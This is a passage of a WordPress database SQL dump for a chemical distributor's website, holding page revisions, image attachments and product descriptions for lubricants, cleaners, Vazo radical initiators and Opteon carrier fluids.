id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-07 18:16:17', '2016-09-07 18:16:17', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1320, 2, '2016-09-07 18:16:37', '2016-09-07 18:16:37', '', '9969', '', 'inherit', 'open', 'closed', '', '9969', '', '', '2016-09-07 18:16:37', '2016-09-07 18:16:37', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9969.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1321, 2, '2016-09-07 18:17:12', '2016-09-07 18:17:12', '', '9971', '', 'inherit', 'open', 'closed', '', '9971', '', '', '2016-09-07 18:17:12', '2016-09-07 18:17:12', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9971.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1322, 2, '2016-09-07 18:17:29', '2016-09-07 18:17:29', '', '9974', '', 'inherit', 'open', 'closed', '', '9974', '', '', '2016-09-07 18:17:29', '2016-09-07 18:17:29', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9974.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1323, 1, '2016-09-07 18:17:35', '2016-09-07 18:17:35', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 50 years of knowledge &amp; experience, Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-07 18:17:35', '2016-09-07 18:17:35', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1325, 2, '2016-09-07 18:17:53', '2016-09-07 18:17:53', '', '9975', '', 'inherit', 'open', 'closed', '', '9975', '', '', '2016-09-07 18:17:53', '2016-09-07 18:17:53', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9975.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1326, 2, '2016-09-07 18:18:18', '2016-09-07 18:18:18', '', '9980', '', 'inherit', 'open', 'closed', '', '9980', '', '', '2016-09-07 18:18:18', '2016-09-07 18:18:18', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9980.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1329, 2, '2016-09-07 18:18:43', '2016-09-07 18:18:43', '', '9982', '', 'inherit', 'open', 'closed', '', '9982', '', '', '2016-09-07 18:18:43', '2016-09-07 18:18:43', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9982.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1330, 2, '2016-09-07 18:19:10', '2016-09-07 18:19:10', '', '9829', '', 'inherit', 'open', 'closed', '', '9829', '', '', '2016-09-07 18:19:10', '2016-09-07 18:19:10', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9829.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1331, 2, '2016-09-07 18:19:29', '2016-09-07 18:19:29', '', '9831', '', 'inherit', 'open', 'closed', '', '9831', '', '', '2016-09-07 18:19:29', '2016-09-07 18:19:29', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9831.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1332, 2, '2016-09-07 18:19:58', '2016-09-07 18:19:58', '', '9880', '', 'inherit', 'open', 'closed', '', '9880', '', '', '2016-09-07 18:19:58', '2016-09-07 18:19:58', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9880.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1334, 2, '2016-09-07 18:20:25', '2016-09-07 18:20:25', '', '9882', '', 'inherit', 'open', 'closed', '', '9882', '', '', '2016-09-07 18:20:25', '2016-09-07 18:20:25', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9882.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1336, 2, '2016-10-04 14:55:37', '2016-10-04 14:55:37', 'One of the greatest advantages of using Krytox GPL 100 oil is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\n\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\n\nKrytox performance lubricants are not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some supercritical fluids, such as CO2.\n\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\n\nKrytox lubricants do not react with gaseous oxygen under shock loading or with liquid oxygen (LOX), nitrogen tetroxide, or inhibited red fuming nitric acid in impact tests. LOX impact tests were conducted in accordance with ASTM D2512. Other impact tests conducted at 214 J/cm2 (200 ft·lb/in2), according to the method described in ASTM Bulletin 250, also showed no reaction. Krytox lubricants have also been evaluated and certified by the BAM Federal Institute for Materials Research and Testing in Germany for reactivity with gaseous and liquid oxygen under pressure. Table 4, “Oxygen Compatibility of Krytox™ Lubricants,” shows oxygen compatibility of Krytox lubricants.\n\nKrytox GPL 100 oil is remarkably stable to radiation when compared with many materials used as lubricants or power fluids. Irradiation of Krytox lubricants causes minor depolymerization, with a consequent reduction in viscosity and formation of volatile products, but not solids or sludge. In one test exposure of a Krytox sample to an electron bombardment of 107 rad at ambient\ntemperature in air resulted in a viscosity decrease of only 8%. The irradiated sample contained no sludge and was unchanged in appearance.', 'GPL 100', 'Krytox GPL 100 has a Oil Viscosity of 5.5 cSt at 40°C. \n<br /><br />\nEstimated useful temperature range is -70°C to 66°C.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '421-autosave-v1', '', '', '2016-10-04 14:55:37', '2016-10-04 14:55:37', '', 421, 'https://132.148.10.86/wordpress/421-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1337, 1, '2016-09-07 18:44:42', '2016-09-07 18:44:42', '[product_categories number="10" parent="0" columns="8" title="Our categories"]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" text_width="70%" text_align="center" text_pos="center" parallax="0" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Semi-Permanent Mold Release</h4>\r\n[button text="TELL ME MORE" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-09-07 18:44:42', '2016-09-07 18:44:42', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1338, 2, '2016-09-07 19:24:06', '2016-09-07 19:24:06', 'A high quality Plastic,Glass &amp; Metal Cleaner MS-260 is especially suitable for non-streak cleaning of glass, metal, ceramic, polycarbonate, acrylic and plastic - including Plexiglas®. Excellent for use on dials, gauges and oscilloscopes. Also recommended for aircraft windshields. Contains no ammonia. No ODC (ozone depleting chemicals). NSN 7930-01-064-5179 (Aerosol). Proprietary cleaning technology allows for quick cleaning and fast drying for a variety of operations.  Foaming actions helps to loosen contaminates and high cleaning solvents gently dissolves solids. Contains Professional strength cleaning agents and ultra high purity solvents.\r\n\r\nMiller-Stephenson MS-260 Plastic, Glass &amp; Metal Cleaner is for industrial use only and is not recommend for consumer applications\r\n\r\n<strong>Features &amp; Benefits: </strong>\r\n<ul id="description-list">\r\n 	<li class="description-list-item">16oz aerosol</li>\r\n 	<li class="description-list-item">Excellent for use on dials, gauges and oscilloscopes</li>\r\n 	<li class="description-list-item">Recommended for aircraft windshields</li>\r\n 	<li class="description-list-item">Contains no ammonia</li>\r\n 	<li class="description-list-item">Non-flammable</li>\r\n 	<li class="description-list-item">No ODC (ozone depleting chemicals)</li>\r\n</ul>\r\n<strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong>', 'MS-260 Plastic, Glass & Metal Cleaner', 'A high quality cleaner especially suitable for non-streak cleaning of glass, metal, ceramic, polycarbonate, acrylic and plastic - including Plexiglas®. Excellent for use on dials, gauges and oscilloscopes. Also recommended for aircraft windshields. Contains no ammonia. No ODC (ozone depleting chemicals). NSN 7930-01-064-5179 (Aerosol).', 'publish', 'open', 'closed', '', 'ms-260', '', '', '2016-11-25 13:41:57', '2016-11-25 13:41:57', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1338', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1339, 2, '2016-09-07 19:22:53', '2016-09-07 19:22:53', '', 'MS-260 Plastic, Glass & Metal Cleaner', '', 'inherit', 'open', 'closed', '', 'cleaner', '', '', '2016-11-25 13:38:30', '2016-11-25 13:38:30', '', 1338, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/cleaner.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1340, 2, '2016-09-07 19:25:30', '2016-09-07 19:25:30', '', 'Plastic, Glass & Metal Cleaner', 'A high quality cleaner especially suitable for non-streak cleaning of glass, metal, ceramic, polycarbonate, acrylic and plastic - including Plexiglas®. Excellent for use on dials, gauges and oscilloscopes. Also recommended for aircraft windshields. Contains no ammonia. No ODC (ozone depleting chemicals). NSN 7930-01-064-5179 (Aerosol).', 'inherit', 'closed', 'closed', '', '1338-autosave-v1', '', '', '2016-09-07 19:25:30', '2016-09-07 19:25:30', '', 1338, 'https://132.148.10.86/wordpress/1338-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1341, 3, '2016-09-07 19:27:25', '2016-09-07 19:27:25', '', 'VAZO 52', '', 'inherit', 'open', 'closed', '', 'vazo-52-5', '', '', '2016-09-07 19:27:25', '2016-09-07 19:27:25', '', 568, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-52-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1342, 3, '2017-06-05 13:06:15', '2017-06-05 13:06:15', '<h2>VAZO 52 | 2-2\'-Azobis(2,4-dimethylvaleronitrile)</h2>\n<h3>Low-Temperature Activation; Azo-radical Initiator</h3>\nVazo 52, known as 2-2\'-Azobis(2,4-dimethylvaleronitrile) is an azo free radical initiator  typically used as a polymerization initiator. Vazo 52 has the lowest initiation temperature within the Vazo product line. This product will thermally decompose to generate free radicals and nitrogen gas. Vazo 52 finds excellent utility as a blowing agent in foams composites. Benefits of Vazo 52 radical initiator include:\n<ul>\n 	<li>Ideal for low-temperature polymerization</li>\n 	<li>Does not compete in costly sides reactions</li>\n 	<li>Low polydispersity; monomer distribution control</li>\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\n 	<li>Can polymerize oxidation susceptible compound</li>\n</ul>\n<a href="https://www.miller-stephenson.com/vazo-free-radical-initiator/">For more information on Vazo radical initiators see our article section</a>\n\nVazo 52 radical Initiator are essentially insoluble in water, sparingly soluble in aliphatic hydrocarbons, and soluble in functionalized organic compounds and aromatic hydrocarbons. Vazo 67 is significantly more soluble in organic solvents and monomers than the other grades. Caution must be used in the handling of highly concentrated solutions to avoid a self-accelerating decomposition.\n<p class="largeText">Solvent-Soluble Vazo™ free radical sources offer a number of advantages over organic peroxides.</p>\n\n<ul>\n 	<li>\n<div>More stable than most peroxides, so can be stored under milder conditions and are not shock-sensitive.</div></li>\n 	<li>\n<div>Decompose with first-order kinetics; not sensitive to metals, acids, and bases; not susceptible to radical-induced decompositions. This makes Vazo™ free radical sources more efficient and predictable than other free radical sources.</div></li>\n 	<li>\n<div>Produce less energetic radicals than peroxides, so there is less branching and cross-linking.</div></li>\n 	<li>\n<div>Are weak oxidizing agents, which lets them be used to polymerize unsaturated amines, mercaptans, and aldehydes without affecting pigments and dyes.</div></li>\n 	<li>\n<div>Are available in four grades to use over a wide temperature range.</div></li>\n</ul>\nFor safety, the maximum storage temperatures are as follows: Vazo™ 52 (10°C [50°F]); Vazo™ 64 and Vazo™ 67 (24°C [75°F]); Vazo™ 88 (35°C [95°F]); Shipping is generally done inside cardboard or plastic containers to reveal any internal pressures if the azo compounds are exposed to increased temperature exposure in transit or while in storage.', 'VAZO 52 | 2-2\'-Azobis(2,4-dimethylvaleronitrile)', 'Vazo 52, known as 2-2&#039;-Azobis(2,4-dimethylvaleronitrile) is a free radical source (FRS) typically used as a polymerization initiator. Vazo 52 has the lowest initiation temperature within the Vazo product line. This product will thermally decompose to generate free radicals and nitrogen gas. Benefits of Vazo 52 include:\n<ul>\n 	<li>Ideal for low-temperature polymerization</li>\n 	<li>Does not compete in costly sides reactions</li>\n 	<li>Low polydispersity; monomer distribution control</li>\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\n 	<li>Can polymerize oxidation susceptible compound</li>\n</ul>\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/vazo-frs-product-banner-e1474375765567.jpg" alt="Vazo Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '568-autosave-v1', '', '', '2017-06-05 13:06:15', '2017-06-05 13:06:15', '', 568, 'https://132.148.10.86/wordpress/568-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1344, 2, '2016-09-08 12:05:31', '2016-09-08 12:05:31', '<h4><strong>Introduction to Opteon™ Suprion</strong></h4>\r\nOpteon™ Suprion carrier fluid is a clear, colorless, nonflammable, thermally stable, fluorinated fluid developed in response to worldwide market demand for a low environmental impact solvent for cleaning, as a carrier fluid, and many other applications. The fluid has a boiling point of 110 °C (230 °F), zero ozone depletion potential (ODP), and a very low global warming potential (GWP) of 2.5 (100-yr ITH). Opteon™ Suprion carrier fluid is appropriate to replace PFCs, PFPEs, HFEs, HFCs, and HCFCs in carrier fluid applications.\r\n<h4><strong>Typical Applications </strong></h4>\r\n<ul>\r\n 	<li>Cleaning agent</li>\r\n 	<li>Carrier fluid in coatings and adhesives</li>\r\n 	<li>Aerosol solvent</li>\r\n</ul>\r\n<h4><strong>Safety, Toxicity, and Environmental</strong></h4>\r\nOpteon™ Suprion carrier fluid is a nonflammable fluid and does not become flammable during boiling or evaporation with thermal stability up to more than 175 °C (347 °F). The material has safe toxicity profile in mammalian studies, and it’s not a skin or eye irritant in laboratory tests. In environmental studies, Opteon™ Suprion carrier fluid exhibited low concern for aquatic life. The occupational exposure limits for Opteon™ Suprion carrier fluid is 500 ppm. Results of extensive toxicity testing studies are available in the Safety Data Sheet.\r\n<h4><strong>Environmental Properties</strong></h4>\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Property</td>\r\n<td width="206">Opteon™ Suprion Carrier Fluid</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion Potential (ODP)</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>Global Warming Potential (GWP) 100-yr ITH</td>\r\n<td style="text-align: center;">2.5</td>\r\n</tr>\r\n<tr>\r\n<td>Atmospheric Lifetime</td>\r\n<td style="text-align: center;"> &lt;10 days</td>\r\n</tr>\r\n<tr>\r\n<td>Volatile Organic Compound</td>\r\n<td style="text-align: center;">Not yet determined</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4><strong>Physical Properties</strong></h4>\r\nRecommended operating range in heat transfer applications: -80 to 105 °C (-112 to 221 °F).\r\n<table width="662">\r\n<tbody>\r\n<tr>\r\n<td width="250">Property (at 25 °C [77 °F])</td>\r\n<td style="text-align: center;" width="206">Units</td>\r\n<td style="text-align: center;" width="206">Opteon™Suprion\r\nCarrier Fluid</td>\r\n</tr>\r\n<tr>\r\n<td>Molecular Weight</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">362</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td style="text-align: center;">°C (°F)</td>\r\n<td style="text-align: center;">110 (230)</td>\r\n</tr>\r\n<tr>\r\n<td>Freezing Point</td>\r\n<td style="text-align: center;">°C (°F)</td>\r\n<td style="text-align: center;">&lt; -90 (&lt;-130)</td>\r\n</tr>\r\n<tr>\r\n<td>Critical Temperature</td>\r\n<td style="text-align: center;">°C (°F)</td>\r\n<td style="text-align: center;">240 (464)</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">KB Value</td>\r\n<td></td>\r\n<td style="text-align: center;">6</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Density</td>\r\n<td style="text-align: center;">kg/m^3 (lb/gal)</td>\r\n<td style="text-align: center;">1580 (13.1)</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Viscosity</td>\r\n<td style="text-align: center;">cSt</td>\r\n<td style="text-align: center;">0.71</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Specific Heat</td>\r\n<td style="text-align: center;">kJ/kg-K</td>\r\n<td style="text-align: center;">1</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Thermal Conductivity</td>\r\n<td style="text-align: center;">W/m-K</td>\r\n<td style="text-align: center;">0.065</td>\r\n</tr>\r\n<tr>\r\n<td>Surface Tension</td>\r\n<td style="text-align: center;">dyn/cm</td>\r\n<td style="text-align: center;">18</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure</td>\r\n<td style="text-align: center;">kPa</td>\r\n<td style="text-align: center;">2.9</td>\r\n</tr>\r\n<tr>\r\n<td>Heat of Vaporization</td>\r\n<td style="text-align: center;">kJ/kg</td>\r\n<td style="text-align: center;">115</td>\r\n</tr>\r\n<tr>\r\n<td>Solubility in Water</td>\r\n<td style="text-align: center;">ppm (w/w)</td>\r\n<td style="text-align: center;">&lt;1</td>\r\n</tr>\r\n<tr>\r\n<td>Water Solubility</td>\r\n<td style="text-align: center;">ppm (w/w)</td>\r\n<td style="text-align: center;">80</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point, CC, ASTM D56</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Flash Point, OC, ASTM D1310</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Flammability, ASTM E681</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4><strong>Vapor Pressure</strong></h4>\r\nPlease refer to the following equation to predict vapor pressure as a function of temperature.\r\n\r\nVapor Pressure (kPa) = exp(14.65 – 3280/[T + 216.4]) T in °C\r\n<h4><strong>Storage and Handling</strong></h4>\r\nOpteon™ Suprion carrier fluid is thermally stable, does not oxidize or degrade during storage, and has no shelf life. Store product in a clean dry area, protect from freezing temperatures, and do not allow stored container to exceed 52 °C ( 125.6 °F). Package sizes for Opteon™ Suprion carrier fluid are available in 6 and 15 kg net weight in high density polyethylene containers and in 300 kg stainless steel drums. When pumping or transferring Opteon™ Suprion carrier fluid from a drum, a braided stainless steel hose is recommended. If a flexible hose is desired, a static charge dissipation hose is recommended, i.e., one constructed with carbon black-filled nylon inner core conductive material.\r\n<h4><strong>Liquid Density</strong></h4>\r\nThe temperature dependence of liquid density for Opteon™ Suprion carrier fluid is shown below\r\n\r\n<img class="size-full wp-image-2622 alignnone" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/liquid-density-opteon-suprion.jpg" alt="liquid-density-opteon-suprion" width="517" height="333" />\r\n<h4><strong>Liquid Viscosity</strong></h4>\r\nThe temperature dependence of liquid viscosity for Opteon™ Suprion carrier fluid is shown below.\r\n\r\n<img class="alignnone size-full wp-image-2623" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/liquid-viscosity-opteon-suprion.jpg" alt="liquid-viscosity-opteon-suprion" width="533" height="335" />\r\n<h4><strong>Critical Heat Flux</strong></h4>\r\nThe critical heat flux of Opteon™ Suprion carrier fluid was estimated at 16 W/cm^2, but the actual value in use will depend on heater geometry and operating conditions. It is recommended that users consult with their local Opteon™ specialty fluids representative for applications requiring a heat flux greater than 12 W/cm^2.\r\n\r\n<a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">To learn more about the Opteon™ series click here.</a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Suprion', 'Opteon™ Suprion carrier fluid is a clear, colorless, nonflammable, thermally stable, fluorinated fluid developed in response to worldwide market demand for a low environmental impact solvent for cleaning, as a carrier fluid, and many other applications.', 'publish', 'open', 'closed', '', 'opteon-suprion', '', '', '2016-10-13 15:49:00', '2016-10-13 15:49:00', '', 0, 'https://132.148.10.86/wordpress/product/suprion/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1345, 2, '2016-09-08 12:09:09', '2016-09-08 12:09:09', '', 'Opteon Suprion', '', 'inherit', 'open', 'closed', '', 'opteon-suprion', '', '', '2016-09-08 12:09:09', '2016-09-08 12:09:09', '', 1344, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Opteon-Suprion.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1346, 2, '2016-10-13 15:44:12', '2016-10-13 15:44:12', '<h4><strong>Introduction to Opteon™ Suprion</strong></h4>\nOpteon™ Suprion carrier fluid is a clear, colorless, nonflammable, thermally stable, fluorinated fluid developed in response to worldwide market demand for a low environmental impact solvent for cleaning, as a carrier fluid, and many other applications. The fluid has a boiling point of 110 °C (230 °F), zero ozone depletion potential (ODP), and a very low global warming potential (GWP) of 2.5 (100-yr ITH). Opteon™ Suprion carrier fluid is appropriate to replace PFCs, PFPEs, HFEs, HFCs, and HCFCs in carrier fluid applications.\n<h4><strong>Typical Applications </strong></h4>\n<ul>\n 	<li>Cleaning agent</li>\n 	<li>Carrier fluid in coatings and adhesives</li>\n 	<li>Aerosol solvent</li>\n</ul>\n<h4><strong>Safety, Toxicity, and Environmental</strong></h4>\nOpteon™ Suprion carrier fluid is a nonflammable fluid and does not become flammable during boiling or evaporation with thermal stability up to more than 175 °C (347 °F). The material has safe toxicity profile in mammalian studies, and it’s not a skin or eye irritant in laboratory tests. In environmental studies, Opteon™ Suprion carrier fluid exhibited low concern for aquatic life. The occupational exposure limits for Opteon™ Suprion carrier fluid is 500 ppm. Results of extensive toxicity testing studies are available in the Safety Data Sheet.\n<h4><strong>Environmental Properties</strong></h4>\n<table width="456">\n<tbody>\n<tr>\n<td width="250">Property</td>\n<td width="206">Opteon™ Suprion Carrier Fluid</td>\n</tr>\n<tr>\n<td>Ozone Depletion Potential (ODP)</td>\n<td style="text-align: center;">0</td>\n</tr>\n<tr>\n<td>Global Warming Potential (GWP) 100-yr ITH</td>\n<td style="text-align: center;">2.5</td>\n</tr>\n<tr>\n<td>Atmospheric Lifetime</td>\n<td style="text-align: center;"> &lt;10 days</td>\n</tr>\n<tr>\n<td>Volatile Organic Compound</td>\n<td style="text-align: center;">Not yet determined</td>\n</tr>\n</tbody>\n</table>\n<h4><strong>Physical Properties</strong></h4>\nRecommended operating range in heat transfer applications: -80 to 105 °C (-112 to 221 °F).\n<table width="662">\n<tbody>\n<tr>\n<td width="250">Property (at 25 °C [77 °F])</td>\n<td style="text-align: center;" width="206">Units</td>\n<td style="text-align: center;" width="206">Opteon™Suprion\nCarrier Fluid</td>\n</tr>\n<tr>\n<td>Molecular Weight</td>\n<td style="text-align: center;">-</td>\n<td style="text-align: center;">362</td>\n</tr>\n<tr>\n<td>Boiling 